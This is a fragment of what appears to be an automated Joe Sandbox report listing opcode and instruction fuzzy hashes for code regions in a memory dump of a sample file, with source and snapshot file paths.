                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b3b309e911b21f0ceb65d0127071c00c42087450d62411e671bec8580ad8845
                                        • Instruction ID: 92f819c939aae7989bdf6b7c416e41b82b8690c0d9c1c268c2985f16bbb313c8
                                        • Opcode Fuzzy Hash: 0b3b309e911b21f0ceb65d0127071c00c42087450d62411e671bec8580ad8845
                                        • Instruction Fuzzy Hash: A4715872D0C7908BD7118F288880669BBE2EFC7714F2883AEF8955B353E7749A41C740
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4dfd43c16ade0af29eef422d7307aa7231d4d1985fd515dd82d2ce158545fdf6
                                        • Instruction ID: c549caf2813647688c78f6fd086e9f3ffacb684576a9d7a365301115ef1d974c
                                        • Opcode Fuzzy Hash: 4dfd43c16ade0af29eef422d7307aa7231d4d1985fd515dd82d2ce158545fdf6
                                        • Instruction Fuzzy Hash: 1A41F477F21A280BE34CD96A9CA526A73C297C4310B4A473DDA96E73D1DC74DD1693C0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                        • Instruction ID: a7f2e301bafa088b108545618e6c68d9c6c700b45113abc45a76c2e8e45d625d
                                        • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                        • Instruction Fuzzy Hash: E331B031B083195BCB54BD6DD4C027AF6D39BD8360F95C67DE589C3380E9B19C488682
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                        • Instruction ID: 2062379dad42fe9d02825a706528b41fb87adac90364c0bb31009f9027bcf141
                                        • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                        • Instruction Fuzzy Hash: 17F0AF73B612690B93A0CDB76D00197A2C3A3C0370F1F8565EC44D7502E9349C4686C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                        • Instruction ID: dfb2ce002bf3c1d8305ccd4aadcfc2897ce14f864a7df03efee45fd5ff42c72e
                                        • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                        • Instruction Fuzzy Hash: E7F08C33A20A340B6360CC7A8D05097A2C797C86B0B0FC969FCA1E7206E930EC0656D1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94638f0503c23f5a9f065e6dee371c2f9ab4350c04c12b62b20f0e8effefbae4
                                        • Instruction ID: ee24dcd353a2aea63874559781dbebcce257bee96636a631d9d79e2285e75174
                                        • Opcode Fuzzy Hash: 94638f0503c23f5a9f065e6dee371c2f9ab4350c04c12b62b20f0e8effefbae4
                                        • Instruction Fuzzy Hash: 7BB012319002004B5706CA39DC711D233B373993003D5C8E8D00345021D675D042CA01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: [
                                        • API String ID: 0-784033777
                                        • Opcode ID: 53efdac023d4ec27c589158b50ca10ec150ecfb063c216f82934ee1bdf84bdc6
                                        • Instruction ID: 155271a66748f125c44107ea152bd068a73e4418790df3f9c97ae1085e66c070
                                        • Opcode Fuzzy Hash: 53efdac023d4ec27c589158b50ca10ec150ecfb063c216f82934ee1bdf84bdc6
                                        • Instruction Fuzzy Hash: 57B14571A083956BDF35BA24C89177ABBD8FF55328F1C092EF8C6C6181FB25C8649352